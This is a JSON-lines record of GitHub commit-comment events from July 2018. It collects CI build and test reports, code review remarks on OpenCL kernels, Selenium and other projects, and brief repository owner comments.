{"id":"8025409826","type":"CommitCommentEvent","actor":{"login":"ipmob"},"repo":{"name":"ipmob/Santander-Value-Prediction-Challenge"},"payload":{"comment":{"id":29850786,"position":null,"line":null,"path":null,"commit_id":"21435b9e2d1183c61726d29715696a2c042ed1f9","created_at":"2018-07-26T21:50:27Z","updated_at":"2018-07-26T21:50:27Z","author_association":"OWNER","body":"joined competetion\r\n"}},"created_at":"2018-07-26T21:50:27Z"}
{"id":"8025419241","type":"CommitCommentEvent","actor":{"login":"clintKunz"},"repo":{"name":"clintKunz/Lambda-Hello"},"payload":{"comment":{"id":29850814,"position":null,"line":null,"path":null,"commit_id":"aba24337e2c38b98bec17d8b2feab5cf1630b5ea","created_at":"2018-07-26T21:52:42Z","updated_at":"2018-07-26T21:52:42Z","author_association":"OWNER","body":"Core Hello Challenge"}},"created_at":"2018-07-26T21:52:42Z"}
{"id":"8025420888","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"jasondegraw/EnergyPlus"},"payload":{"comment":{"id":29850818,"position":null,"line":null,"path":null,"commit_id":"753c45b97a391b05fc27e5fc86f10adc084ac7e8","created_at":"2018-07-26T21:53:07Z","updated_at":"2018-07-26T21:53:07Z","author_association":"NONE","body":"fix-eio-wind-angles (jasondegraw) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2304 of 2304 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-753c45b97a391b05fc27e5fc86f10adc084ac7e8-PR6858-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-753c45b97a391b05fc27e5fc86f10adc084ac7e8-PR6858-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-753c45b97a391b05fc27e5fc86f10adc084ac7e8-PR6858-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.14%25-green.png)</a>\n"}},"created_at":"2018-07-26T21:53:07Z"}
{"id":"8025421669","type":"CommitCommentEvent","actor":{"login":"Mimic99"},"repo":{"name":"JSEcoin/server"},"payload":{"comment":{"id":29850821,"position":null,"line":null,"path":null,"commit_id":"4d0dcc19be7083fa4c92face3db827bf7425d11a","created_at":"2018-07-26T21:53:19Z","updated_at":"2018-07-26T21:53:19Z","author_association":"NONE","body":"Why not just (subApp === 'e4a8b3c1')? :)"}},"created_at":"2018-07-26T21:53:19Z"}
{"id":"8025432592","type":"CommitCommentEvent","actor":{"login":"turtles"},"repo":{"name":"TransgenderHousingRelief/TransgenderHousingRelief"},"payload":{"comment":{"id":29850843,"position":null,"line":null,"path":null,"commit_id":"b5c709fc37990d207dbf7b12b0a6e4470bb15584","created_at":"2018-07-26T21:56:01Z","updated_at":"2018-07-26T21:56:01Z","author_association":"CONTRIBUTOR","body":"Safety Tips Page Layout #87"}},"created_at":"2018-07-26T21:56:01Z"}
{"id":"8025433320","type":"CommitCommentEvent","actor":{"login":"qaisjp"},"repo":{"name":"mattdiamond/fuckitjs"},"payload":{"comment":{"id":29850845,"position":13,"line":44,"path":"test.html","commit_id":"a5f864cbbaa81a50a0ca45cde1ac9775b67f7783","created_at":"2018-07-26T21:56:12Z","updated_at":"2018-07-26T21:56:12Z","author_association":"NONE","body":"Indentation is awkward here"}},"created_at":"2018-07-26T21:56:12Z"}
{"id":"8025434268","type":"CommitCommentEvent","actor":{"login":"gitmate-bot"},"repo":{"name":"coala/coala"},"payload":{"comment":{"id":29850848,"position":null,"line":null,"path":null,"commit_id":"1d975ce359c32ee1f08358ae6de3122ed8be6f57","created_at":"2018-07-26T21:56:25Z","updated_at":"2018-07-26T21:56:25Z","author_association":"COLLABORATOR","body":"Comment on 1d975ce359c32ee1f08358ae6de3122ed8be6f57.\n\nThere are 11 results for the section autopep8. They have been shortened and will not be shown inline because they are more than 10.\n\n| Message | File | Line |\n|---|---|---|\n| The code does not comply to PEP8. | coalib/parsing/CliParsing.py | 8 |\n| The code does not comply to PEP8. | coalib/parsing/CliParsing.py | 15 |\n| E302 expected 2 blank lines, found 1 | coalib/parsing/CliParsing.py | 9 |\n| E501 line too long (85 > 80 characters) | coalib/parsing/CliParsing.py | 14 |\n| E302 expected 2 blank lines, found 0 | coalib/parsing/CliParsing.py | 16 |\n| The code does not comply to PEP8. | coalib/parsing/ConfParser.py | 10 |\n| The code does not comply to PEP8. | coalib/parsing/ConfParser.py | 18 |\n| E302 expected 2 blank lines, found 1 | coalib/parsing/ConfParser.py | 11 |\n| E501 line too long (85 > 80 characters) | coalib/parsing/ConfParser.py | 16 |\n| W293 blank line contains whitespace | coalib/parsing/ConfParser.py | 18 |\n| E302 expected 2 blank lines, found 1 | coalib/parsing/ConfParser.py | 19 |\n\nUntil GitMate provides an online UI to show a better overview, you can run [coala](https://coala.io/) locally for more details."}},"created_at":"2018-07-26T21:56:25Z"}
{"id":"8025436582","type":"CommitCommentEvent","actor":{"login":"RDIL"},"repo":{"name":"BestBattleshipGame/Game"},"payload":{"comment":{"id":29850852,"position":null,"line":null,"path":null,"commit_id":"abd2b016b5c18f90d91622d82dcedc66c5b2b3e2","created_at":"2018-07-26T21:57:00Z","updated_at":"2018-07-26T21:57:00Z","author_association":"MEMBER","body":"it works yay"}},"created_at":"2018-07-26T21:57:00Z"}
{"id":"8025438627","type":"CommitCommentEvent","actor":{"login":"abuwafi"},"repo":{"name":"ElectraJailbreak/electratools"},"payload":{"comment":{"id":29850859,"position":null,"line":null,"path":null,"commit_id":"149c75e7e1e078c5ec6b3ea066a6a8e70f641387","created_at":"2018-07-26T21:57:32Z","updated_at":"2018-07-26T21:57:32Z","author_association":"NONE","body":"thank you"}},"created_at":"2018-07-26T21:57:32Z"}
{"id":"8025442887","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"Lisss13/courses"},"payload":{"comment":{"id":29850869,"position":6,"line":6,"path":"1/area_of_triangle.rb","commit_id":"673debe6366db5c71e58a14c2e0d0c3682f44458","created_at":"2018-07-26T21:58:36Z","updated_at":"2018-07-26T21:58:36Z","author_association":"NONE","body":"https://github.com/rubocop-hq/rubocop"}},"created_at":"2018-07-26T21:58:36Z"}
{"id":"8025443850","type":"CommitCommentEvent","actor":{"login":"31m059"},"repo":{"name":"protonspring/Stockfish"},"payload":{"comment":{"id":29850874,"position":null,"line":null,"path":null,"commit_id":"2b92aeea905ed59efaa4e7f11735ba033f42d202","created_at":"2018-07-26T21:58:51Z","updated_at":"2018-07-26T21:58:51Z","author_association":"NONE","body":"@protonspring For what it's worth, you've convinced me. Good luck on your tests!"}},"created_at":"2018-07-26T21:58:51Z"}
{"id":"8025447675","type":"CommitCommentEvent","actor":{"login":"martdev1963"},"repo":{"name":"martdev1963/Finished-Programs"},"payload":{"comment":{"id":29850884,"position":null,"line":null,"path":null,"commit_id":"6e91c3cd5ae3b65967a1fc37dd8f9054d364caa8","created_at":"2018-07-26T21:59:50Z","updated_at":"2018-07-26T21:59:50Z","author_association":"OWNER","body":"Database back-end code for Bookstore desktop app "}},"created_at":"2018-07-26T21:59:50Z"}
{"id":"8025454388","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":29850909,"position":null,"line":null,"path":null,"commit_id":"cb278d35d04c36bb6bd7f73827c986fd4519cbea","created_at":"2018-07-26T22:01:23Z","updated_at":"2018-07-26T22:01:23Z","author_association":"COLLABORATOR","body":"Related to: backdrop/backdrop-issues#2924 "}},"created_at":"2018-07-26T22:01:23Z"}
{"id":"8025454401","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":29850910,"position":null,"line":null,"path":null,"commit_id":"b98d824ec6cc3a12c298f8c05aa45cccb460b318","created_at":"2018-07-26T22:01:23Z","updated_at":"2018-07-26T22:01:23Z","author_association":"COLLABORATOR","body":"Related to: backdrop/backdrop-issues#3195 "}},"created_at":"2018-07-26T22:01:23Z"}
{"id":"8025454416","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":29850911,"position":null,"line":null,"path":null,"commit_id":"aacd2f33297a1a17b13f3a2dd152997d1df86915","created_at":"2018-07-26T22:01:23Z","updated_at":"2018-07-26T22:01:23Z","author_association":"COLLABORATOR","body":"Related to: backdrop/backdrop-issues#3169 "}},"created_at":"2018-07-26T22:01:23Z"}
{"id":"8025454447","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":29850912,"position":null,"line":null,"path":null,"commit_id":"dd91eca915520ec7aaa85ebcfbda0417db64b349","created_at":"2018-07-26T22:01:23Z","updated_at":"2018-07-26T22:01:23Z","author_association":"COLLABORATOR","body":"Related to: backdrop/backdrop-issues#3152 "}},"created_at":"2018-07-26T22:01:23Z"}
{"id":"8025454468","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":29850913,"position":null,"line":null,"path":null,"commit_id":"5b8d2417bdc1085a22f2d006ab6f451a34e107e2","created_at":"2018-07-26T22:01:24Z","updated_at":"2018-07-26T22:01:24Z","author_association":"COLLABORATOR","body":"Related to: backdrop/backdrop-issues#3028 "}},"created_at":"2018-07-26T22:01:24Z"}
{"id":"8025454494","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":29850914,"position":null,"line":null,"path":null,"commit_id":"96b0cd3c60986a8b64e6382095d1e59de456f599","created_at":"2018-07-26T22:01:24Z","updated_at":"2018-07-26T22:01:24Z","author_association":"COLLABORATOR","body":"Related to: backdrop/backdrop-issues#3207 "}},"created_at":"2018-07-26T22:01:24Z"}
{"id":"8025454518","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":29850915,"position":null,"line":null,"path":null,"commit_id":"eb5c3c9fac2c7f753693caf4ed818567cd1f13a6","created_at":"2018-07-26T22:01:24Z","updated_at":"2018-07-26T22:01:24Z","author_association":"COLLABORATOR","body":"Related to: backdrop/backdrop-issues#3213 "}},"created_at":"2018-07-26T22:01:24Z"}
{"id":"8025455318","type":"CommitCommentEvent","actor":{"login":"stetay2233"},"repo":{"name":"cha0tik/catFeeder"},"payload":{"comment":{"id":29850918,"position":null,"line":null,"path":null,"commit_id":"a672a8dac3d818f86755128b17f15d1f9fea987c","created_at":"2018-07-26T22:01:35Z","updated_at":"2018-07-26T22:01:35Z","author_association":"NONE","body":"do you have any idea why i would be getting: 'class NTPClient' has no member named 'getFullFormattedTime' when trying to compile this? all i have done is filled in the items for REPLACEME and set the board to the NODEMCU 0.9"}},"created_at":"2018-07-26T22:01:35Z"}
{"id":"8025458371","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"jasondegraw/EnergyPlus"},"payload":{"comment":{"id":29850926,"position":null,"line":null,"path":null,"commit_id":"b863eb6e939cb9e11beb1e4136244250725d29a3","created_at":"2018-07-26T22:02:19Z","updated_at":"2018-07-26T22:02:19Z","author_association":"NONE","body":"fix-eio-wind-angles (jasondegraw) - x86_64-MacOS-10.9-clang: Tests Failed (1386 of 2948 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 1\n * Failed: 625\n\nregression Test Summary\n * Passed: 622\n * Failed: 2\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b863eb6e939cb9e11beb1e4136244250725d29a3-PR6858-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b863eb6e939cb9e11beb1e4136244250725d29a3-PR6858-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-47.01%25-red.png)</a> \n"}},"created_at":"2018-07-26T22:02:19Z"}
{"id":"8025466504","type":"CommitCommentEvent","actor":{"login":"HDVinnie"},"repo":{"name":"HDInnovations/UNIT3D"},"payload":{"comment":{"id":29850950,"position":5,"line":24,"path":"config/censor.php","commit_id":"9e70fb55186e1b9881ad578ec5d0190a8b4f03ff","created_at":"2018-07-26T22:04:26Z","updated_at":"2018-07-26T22:04:26Z","author_association":"COLLABORATOR","body":"This section should actually be removed from the config since the censor system is user based and not global .\r\n\r\nhttps://github.com/HDInnovations/UNIT3D/blob/master/database/migrations/2018_03_21_000000_add_censor_to_users_table.php\r\n\r\n"}},"created_at":"2018-07-26T22:04:26Z"}
{"id":"8025467910","type":"CommitCommentEvent","actor":{"login":"syuilo"},"repo":{"name":"syuilo/misskey"},"payload":{"comment":{"id":29850952,"position":8,"line":24,"path":"locales/index.js","commit_id":"886510d721f21e73972477bc8c8abbe71c1247bf","created_at":"2018-07-26T22:04:49Z","updated_at":"2018-07-26T22:04:49Z","author_association":"OWNER","body":"これだと全ての翻訳が日本語になってしまう"}},"created_at":"2018-07-26T22:04:49Z"}
{"id":"8025468385","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29850953,"position":null,"line":null,"path":null,"commit_id":"6776bbe35c5971923dc495bb1cdfdca8d0cce66e","created_at":"2018-07-26T22:04:56Z","updated_at":"2018-07-26T22:04:56Z","author_association":"COLLABORATOR","body":"TeamCity Solution Engineering / Packer Templates [Build 554](https://ci.hashicorp.engineering/viewLog.html?buildId=107269&buildTypeId=SolutionEngineering_PackerTemplates) is now running\n"}},"created_at":"2018-07-26T22:04:56Z"}
{"id":"8025470261","type":"CommitCommentEvent","actor":{"login":"kkadakia2"},"repo":{"name":"kkadakia2/cis2178"},"payload":{"comment":{"id":29850956,"position":null,"line":null,"path":null,"commit_id":"57116d32361086db633edab50be64625c3c75987","created_at":"2018-07-26T22:05:25Z","updated_at":"2018-07-26T22:05:25Z","author_association":"OWNER","body":"asdadasd"}},"created_at":"2018-07-26T22:05:25Z"}
{"id":"8025470597","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29850958,"position":null,"line":null,"path":null,"commit_id":"6776bbe35c5971923dc495bb1cdfdca8d0cce66e","created_at":"2018-07-26T22:05:30Z","updated_at":"2018-07-26T22:05:30Z","author_association":"COLLABORATOR","body":"TeamCity Solution Engineering / Packer Templates [Build 554](https://ci.hashicorp.engineering/viewLog.html?buildId=107269&buildTypeId=SolutionEngineering_PackerTemplates) outcome was **FAILURE**\nSummary: Exit code 1 (new) Build time: 00:00:34"}},"created_at":"2018-07-26T22:05:30Z"}
{"id":"8025470789","type":"CommitCommentEvent","actor":{"login":"romix"},"repo":{"name":"ZchiPitt/glow"},"payload":{"comment":{"id":29850959,"position":51,"line":167,"path":"lib/Backends/OpenCL/kernels_fwd_conv.cl","commit_id":"2301b6d317a83564be2cf1457b9e82d149356b63","created_at":"2018-07-26T22:05:33Z","updated_at":"2018-07-26T22:05:33Z","author_association":"NONE","body":"I'd suggest to defined a ZERO instead. When QUANTIZED is defined, ZERO is 0, otherwise it is 0.0\r\n"}},"created_at":"2018-07-26T22:05:33Z"}
{"id":"8025472053","type":"CommitCommentEvent","actor":{"login":"HDVinnie"},"repo":{"name":"HDInnovations/UNIT3D"},"payload":{"comment":{"id":29850961,"position":4,"line":55,"path":"app/Repositories/ChatRepository.php","commit_id":"9ead227613c988ac3aa9d34f492071f107c339d7","created_at":"2018-07-26T22:05:53Z","updated_at":"2018-07-26T22:05:53Z","author_association":"COLLABORATOR","body":"See my other comment. This should check against users censor column in DB."}},"created_at":"2018-07-26T22:05:53Z"}
{"id":"8025476575","type":"CommitCommentEvent","actor":{"login":"adamgarza"},"repo":{"name":"adamgarza/opencensus-java"},"payload":{"comment":{"id":29850978,"position":21,"line":511,"path":"contrib/zpages/src/main/java/io/opencensus/contrib/zpages/RpczZPageHandler.java","commit_id":"84e5eaf5abdcf0b840fe4adc50de80450a6c76df","created_at":"2018-07-26T22:07:06Z","updated_at":"2018-07-26T22:07:06Z","author_association":"OWNER","body":"I'll do my best to figure this out! "}},"created_at":"2018-07-26T22:07:06Z"}
{"id":"8025476940","type":"CommitCommentEvent","actor":{"login":"romix"},"repo":{"name":"ZchiPitt/glow"},"payload":{"comment":{"id":29850980,"position":90,"line":317,"path":"lib/Backends/OpenCL/kernels_fwd_conv.cl","commit_id":"2301b6d317a83564be2cf1457b9e82d149356b63","created_at":"2018-07-26T22:07:12Z","updated_at":"2018-07-26T22:07:12Z","author_association":"NONE","body":"Let's define two macros, like \r\n```c++\r\n#define A_OFFSET(x) ((x)- Aoffset)\r\n#define B_OFFSET(x) ((x)- Boffset)\r\n```"}},"created_at":"2018-07-26T22:07:12Z"}
{"id":"8025482909","type":"CommitCommentEvent","actor":{"login":"romix"},"repo":{"name":"ZchiPitt/glow"},"payload":{"comment":{"id":29851005,"position":5,"line":390,"path":"lib/Backends/OpenCL/OpenCL.cpp","commit_id":"2301b6d317a83564be2cf1457b9e82d149356b63","created_at":"2018-07-26T22:08:48Z","updated_at":"2018-07-26T22:08:48Z","author_association":"NONE","body":"Why do we need this `=\"\"`"}},"created_at":"2018-07-26T22:08:48Z"}
{"id":"8025489228","type":"CommitCommentEvent","actor":{"login":"romix"},"repo":{"name":"ZchiPitt/glow"},"payload":{"comment":{"id":29851027,"position":39,"line":159,"path":"lib/Backends/OpenCL/kernels_fwd_conv.cl","commit_id":"2301b6d317a83564be2cf1457b9e82d149356b63","created_at":"2018-07-26T22:10:31Z","updated_at":"2018-07-26T22:10:31Z","author_association":"NONE","body":"Why can't we define Creg outside the ifdef using Dtype4? Is it because there is no char4,  but only int4 provided by OpenCL?"}},"created_at":"2018-07-26T22:10:31Z"}
{"id":"8025491741","type":"CommitCommentEvent","actor":{"login":"Mimic99"},"repo":{"name":"JSEcoin/server"},"payload":{"comment":{"id":29851034,"position":null,"line":null,"path":null,"commit_id":"4d0dcc19be7083fa4c92face3db827bf7425d11a","created_at":"2018-07-26T22:11:12Z","updated_at":"2018-07-26T22:11:12Z","author_association":"NONE","body":"You should keep keys like this in a config file"}},"created_at":"2018-07-26T22:11:12Z"}
{"id":"8025491953","type":"CommitCommentEvent","actor":{"login":"romix"},"repo":{"name":"ZchiPitt/glow"},"payload":{"comment":{"id":29851035,"position":39,"line":159,"path":"lib/Backends/OpenCL/kernels_fwd_conv.cl","commit_id":"2301b6d317a83564be2cf1457b9e82d149356b63","created_at":"2018-07-26T22:11:16Z","updated_at":"2018-07-26T22:11:16Z","author_association":"NONE","body":"If this is the case, may be we should define Dtype4 as int4 in case of QUANTIZED?"}},"created_at":"2018-07-26T22:11:16Z"}
{"id":"8025499153","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29851054,"position":null,"line":null,"path":null,"commit_id":"3926285b87e3b07937fdf38a09d5b4a8b092ed35","created_at":"2018-07-26T22:13:08Z","updated_at":"2018-07-26T22:13:08Z","author_association":"COLLABORATOR","body":"TeamCity Solution Engineering / Packer Templates [Build 555](https://ci.hashicorp.engineering/viewLog.html?buildId=107276&buildTypeId=SolutionEngineering_PackerTemplates) is now running\n"}},"created_at":"2018-07-26T22:13:08Z"}
{"id":"8025500192","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29851061,"position":null,"line":null,"path":null,"commit_id":"3926285b87e3b07937fdf38a09d5b4a8b092ed35","created_at":"2018-07-26T22:13:23Z","updated_at":"2018-07-26T22:13:23Z","author_association":"COLLABORATOR","body":"TeamCity Solution Engineering / Packer Templates [Build 555](https://ci.hashicorp.engineering/viewLog.html?buildId=107276&buildTypeId=SolutionEngineering_PackerTemplates) outcome was **SUCCESS**\nSummary: Running Build time: 00:00:15"}},"created_at":"2018-07-26T22:13:23Z"}
{"id":"8025500222","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29851062,"position":null,"line":null,"path":null,"commit_id":"3926285b87e3b07937fdf38a09d5b4a8b092ed35","created_at":"2018-07-26T22:13:23Z","updated_at":"2018-07-26T22:13:23Z","author_association":"COLLABORATOR","body":"TeamCity Solution Engineering / Packer Templates [Build 556](https://ci.hashicorp.engineering/viewLog.html?buildId=107277&buildTypeId=SolutionEngineering_PackerTemplates) is now running\n"}},"created_at":"2018-07-26T22:13:23Z"}
{"id":"8025500959","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29851063,"position":null,"line":null,"path":null,"commit_id":"3926285b87e3b07937fdf38a09d5b4a8b092ed35","created_at":"2018-07-26T22:13:36Z","updated_at":"2018-07-26T22:13:36Z","author_association":"COLLABORATOR","body":"TeamCity Solution Engineering / Packer Templates [Build 556](https://ci.hashicorp.engineering/viewLog.html?buildId=107277&buildTypeId=SolutionEngineering_PackerTemplates) outcome was **SUCCESS**\nSummary: Running Build time: 00:00:12"}},"created_at":"2018-07-26T22:13:36Z"}
{"id":"8025503182","type":"CommitCommentEvent","actor":{"login":"cgcloud-jenkins"},"repo":{"name":"vgteam/vg"},"payload":{"comment":{"id":29851071,"position":null,"line":null,"path":null,"commit_id":"02a085c1f9902d94a25e8cdffafc16eb7ff8a4a2","created_at":"2018-07-26T22:14:13Z","updated_at":"2018-07-26T22:14:13Z","author_association":"NONE","body":"[Jenkins vg tests](http://jenkins.cgcloud.info/job/vg/2051/) complete for merge to master.  View the [full report here](http://cgl-pipeline-inputs.s3.amazonaws.com/vg_cgl/vg_ci/jenkins_reports/branch/master/index.html).\n\n19 tests passed, 0 tests failed and 10 tests skipped in 21410 seconds\n\nTests produced 2791 warnings. 2791 were for lower-than-expected alignment scores\n\n"}},"created_at":"2018-07-26T22:14:13Z"}
{"id":"8025504001","type":"CommitCommentEvent","actor":{"login":"JamesJSE"},"repo":{"name":"JSEcoin/server"},"payload":{"comment":{"id":29851075,"position":null,"line":null,"path":null,"commit_id":"4d0dcc19be7083fa4c92face3db827bf7425d11a","created_at":"2018-07-26T22:14:26Z","updated_at":"2018-07-26T22:14:26Z","author_association":"CONTRIBUTOR","body":"Hi Mimic, thanks, we do for anything critical but it would probably help here too. "}},"created_at":"2018-07-26T22:14:26Z"}
{"id":"8025504070","type":"CommitCommentEvent","actor":{"login":"discoursebot"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29851076,"position":null,"line":null,"path":null,"commit_id":"fad9c2b97113ddbac16d968c38edb7ab47aa8eb9","created_at":"2018-07-26T22:14:27Z","updated_at":"2018-07-26T22:14:27Z","author_association":"NONE","body":"This commit has been mentioned on **Discourse Meta**. There might be relevant details there:\n\nhttps://meta.discourse.org/t/error-when-restore-db-backup/93145/22\n"}},"created_at":"2018-07-26T22:14:27Z"}
{"id":"8025505404","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29851079,"position":null,"line":null,"path":null,"commit_id":"c8cbe59370eef87a8645d9db183b0e1f0b7633fb","created_at":"2018-07-26T22:14:50Z","updated_at":"2018-07-26T22:14:50Z","author_association":"COLLABORATOR","body":"TeamCity Solution Engineering / Packer Templates [Build 557](https://ci.hashicorp.engineering/viewLog.html?buildId=107278&buildTypeId=SolutionEngineering_PackerTemplates) is now running\n"}},"created_at":"2018-07-26T22:14:50Z"}
{"id":"8025506118","type":"CommitCommentEvent","actor":{"login":"MiloshBo"},"repo":{"name":"MiloshBo/googlesearch"},"payload":{"comment":{"id":29851080,"position":null,"line":null,"path":null,"commit_id":"e541e675a37c58e644eaf94a3683343d71a2e4b7","created_at":"2018-07-26T22:15:02Z","updated_at":"2018-07-26T22:15:02Z","author_association":"OWNER","body":"This project is made to ease google search. Just type your search term into command line and click enter. It will automatically open first five search results."}},"created_at":"2018-07-26T22:15:02Z"}
{"id":"8025507047","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29851083,"position":null,"line":null,"path":null,"commit_id":"c8cbe59370eef87a8645d9db183b0e1f0b7633fb","created_at":"2018-07-26T22:15:16Z","updated_at":"2018-07-26T22:15:16Z","author_association":"COLLABORATOR","body":"TeamCity Solution Engineering / Packer Templates [Build 557](https://ci.hashicorp.engineering/viewLog.html?buildId=107278&buildTypeId=SolutionEngineering_PackerTemplates) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:00:26"}},"created_at":"2018-07-26T22:15:16Z"}
{"id":"8025508106","type":"CommitCommentEvent","actor":{"login":"ACueva"},"repo":{"name":"Esri/visibility-addin-dotnet"},"payload":{"comment":{"id":29851089,"position":4,"line":56,"path":"source/addins/ProAppVisibilityModule/ProAppVisibilityModule.csproj","commit_id":"573fa78bd008acf2c95e4824da145cb07559b157","created_at":"2018-07-26T22:15:33Z","updated_at":"2018-07-26T22:15:33Z","author_association":"CONTRIBUTOR","body":"@topowright @dfoll This line as well as Line 59 are causing build issues.  These lines appear to be referencing an ArcMap 10.3 dependency.  The build machine we are building against, SolMeeSeeks03 does not have ArcMap installed on it.  IMO, we shouldn't have to install ArcMap for an ArcGIS Pro project to compile."}},"created_at":"2018-07-26T22:15:33Z"}
{"id":"8025512650","type":"CommitCommentEvent","actor":{"login":"twalpole"},"repo":{"name":"SeleniumHQ/selenium"},"payload":{"comment":{"id":29851104,"position":6,"line":366,"path":"rb/lib/selenium/webdriver/remote/oss/bridge.rb","commit_id":"a3d2f41cd392c9842e3b37be673ec0e287c58ce8","created_at":"2018-07-26T22:16:46Z","updated_at":"2018-07-26T22:16:46Z","author_association":"CONTRIBUTOR","body":"This appears to break sending keys to a non-file input if a file detector is specified - https://travis-ci.org/teamcapybara/capybara/jobs/408695437"}},"created_at":"2018-07-26T22:16:46Z"}
{"id":"8025517530","type":"CommitCommentEvent","actor":{"login":"PiBa-NL"},"repo":{"name":"pfsense/FreeBSD-ports"},"payload":{"comment":{"id":29851117,"position":null,"line":null,"path":null,"commit_id":"7c2caf5a2b8f4169832e30d03ab8987198f86bda","created_at":"2018-07-26T22:18:06Z","updated_at":"2018-07-26T22:18:06Z","author_association":"CONTRIBUTOR","body":"ow crap.. perhaps as a 'easy' workaround you can switch to the haproxy-devel package.. it seems to work here with same config and SNI..\r\n\r\nby chance anyone on IRC #pfSense at the moment?"}},"created_at":"2018-07-26T22:18:06Z"}
{"id":"8025517577","type":"CommitCommentEvent","actor":{"login":"twalpole"},"repo":{"name":"SeleniumHQ/selenium"},"payload":{"comment":{"id":29851118,"position":6,"line":363,"path":"rb/lib/selenium/webdriver/remote/w3c/bridge.rb","commit_id":"a3d2f41cd392c9842e3b37be673ec0e287c58ce8","created_at":"2018-07-26T22:18:07Z","updated_at":"2018-07-26T22:18:07Z","author_association":"CONTRIBUTOR","body":"This appears to break sending keys to a non-file input if a file detector is specified https://travis-ci.org/teamcapybara/capybara/jobs/408695434"}},"created_at":"2018-07-26T22:18:07Z"}
{"id":"8025525122","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":29851142,"position":null,"line":null,"path":null,"commit_id":"b83babb757d0d528b7103a65260f0f29d39254b6","created_at":"2018-07-26T22:20:10Z","updated_at":"2018-07-26T22:20:10Z","author_association":"COLLABORATOR","body":"Related to: backdrop/backdrop-issues#3213 "}},"created_at":"2018-07-26T22:20:10Z"}
{"id":"8025531965","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29851158,"position":null,"line":null,"path":null,"commit_id":"74f871687b714c510710ca08826ffc188262889b","created_at":"2018-07-26T22:22:03Z","updated_at":"2018-07-26T22:22:03Z","author_association":"OWNER","body":"Created multidev environment [dgreat#ci-1082](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#ci-1082).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-1082-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-26T22:22:03Z"}
{"id":"8025536246","type":"CommitCommentEvent","actor":{"login":"opti-mix"},"repo":{"name":"ZchiPitt/glow"},"payload":{"comment":{"id":29851180,"position":143,"line":376,"path":"lib/Backends/OpenCL/kernels_fwd_conv.cl","commit_id":"2301b6d317a83564be2cf1457b9e82d149356b63","created_at":"2018-07-26T22:23:13Z","updated_at":"2018-07-26T22:23:13Z","author_association":"NONE","body":"May be we should have `CLIP` and `ROUND` always defined as macros, but if it is a non-quantized mode, then they are defined as no-ops? \r\n\r\nNo strong opinion here. Eventually, we may end-up having two different kernels: one for non-quantized and one for quantized."}},"created_at":"2018-07-26T22:23:13Z"}
